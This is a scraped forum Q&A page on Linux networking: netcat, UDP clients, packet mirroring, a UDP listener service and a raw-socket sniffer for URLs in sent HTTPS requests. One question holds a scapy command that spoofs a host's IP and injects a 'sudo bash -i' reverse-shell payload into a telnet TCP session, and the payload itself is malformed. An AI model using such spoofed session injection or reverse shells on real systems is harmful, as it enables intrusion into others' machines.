i have to send byte array using TCP/IP in Linux. Which program should i use? I couldn't use netcat because program gives me an error about authorization. I can send data through telnet but i can't use telnet to send raw data.
You can use netcat to send raw data. If it's giving you an error about authorization any other alternatives will probably do the same; I'm guessing the error comes from the host you're trying to connect to.
Please try to post more information (the actual error) and the options you're passing to netcat.
Related
I have a question about how to make the server add a client to a list right after the client connected? In UDP, I know that only after the client sends the message to the server then the server knows who sent the message (address). But what I want here is to make the server know who connected, and add to the list before receiving the message.
Is that possible for UDP?
Thank you for answering my question, my English is not so good so please ignore my grammar.
In the terminal, I initiate the terminal with
python3 ChatServer.py 9099 (9099 is random number I assigned to be port number)
Then to call multiple clients, I run this command twice
python3 ChatClient.py hostname 9099
If you need I'll send my code.
But what I want here is to make the server know who connected, and add to the list before receiving the message. Is that possible for UDP?
With TCP there is an initial connection setup where no data are transferred - so it is possible to know the client before receiving application data.
With UDP though it all starts with the first data packet received, i.e. with the first actual message sent by the client. This means UDP itself provides no way to know the client before receiving the first message.
Of course, one might gain some knowledge through a different way, like some configuration about which clients are expected. In this way these clients need to explicitly bind to the IP and port expected by the server though, because otherwise some random source port will be used which is not expected by the server.
I am learning on how to do reverse shell using scapy by using spoofed IP address(legitimate host) and mac address.
I am using this command :
send(IP(src="192.168.0.114",dst="192.168.0.113")/TCP(sport=54484,dport=23,seq=2034533561,ack=1565253469)/ Raw(load="sudo bash -i > /home/192.168.0.112/9090”))
I can see in wireshark that the server(192.168.0.113) accepted the packet, but never trigger the reverse shell connection to the attacker (192.168.0.112)
What am I doing wrong here ? Still quite new in using scapy.
Thanks in advance.
I think your server should extract the data from the packet, after that transfers the data to be readable text which could be running on the server shell.
I would like to create a demo with the following topology:
... --->[switch] <---> [Host]
DEMO: A switch sends a packet to a monitoring Host (The packets original destination is not this Host, yet switch will send to it via a mirror port). The monitor-Host is to capture that packet, do something with it (e.g., just dump the L2-L4 header fields into some log file), and then send the original packet back towards the switch.
Host Environment: Ubuntu 12.04 Linux.
Dilemma: What's the simplest way I can capture the packet in Host and send back the original packet to the switch?
Possibilities to Explore:
Create a packet sniffer program in C (looks complex ... libpcap, AF_Packet sockets etc.).
Try to use python scapy (don't know how complex this will be).
Try to install some open source proxy server of some kind to which I can write a plugin that will examine the captured packets.
Question: Any better recommendations (if I can avoid going the programming route, it would be preferred. Is there any simple scripting method to do this?). Looking for a quick-and-dirty method here. Thanks.
well, you can use packets sniffers available such as wireshark, ettercap which will capture all network packets (using promisc mode) and dump them in readable format.
Or, you can preety much easily code sniffer for yourself in python, linux which is not so much complex to understand..
I want to build a service on my Linux VPS which listens to a certain UDP port and does something with the (text)message which is captured. This processing consists of appending the message to a locally stored txt-file and send it as http, with a post variable to another server.
I've looked into Nginx but as far is can see this server can only be bound to receive http packets. Although it is asynchronous.
What is the best way to achieve this listening-service on linux? And which has the capabilities to do the above mentioned processing?
Is for instance node.js a possibilty? It looks great
For simplicity, you can use xinetd, and for the app you can use any scripting language, which will read the packet from the stdin and save it to the file.
I need to write a packet sniffer in Linux that detects HTTPS packet that are sent and save the url from the request. I found code for this in security-freak and ran it. This code runs and only sniffs the received packet but I need to get the sent packet in the sniffer.
How do I get the sent packet in this code?
I can't use any library like libcap (forbidden).
The code is :sniffer.c
You should be using ETH_P_ALL instead of ETH_P_IP as the protocol. ETH_P_IP only listens for incoming IP packets.
Why can't you use any library? Homework?
It's hard to answer without having examples from your code, for example how you set sll_pkttype.
The urlsnarf tool in the dnsiff suite could be worth a look.
With appropriate libpcap or DNET usage You should be able to get all network
traffic on the desired layer (protocol - 5) (also this outgoing).
But You should know that already.
You need to go through the above libraries manuals and find the appropriate filtering.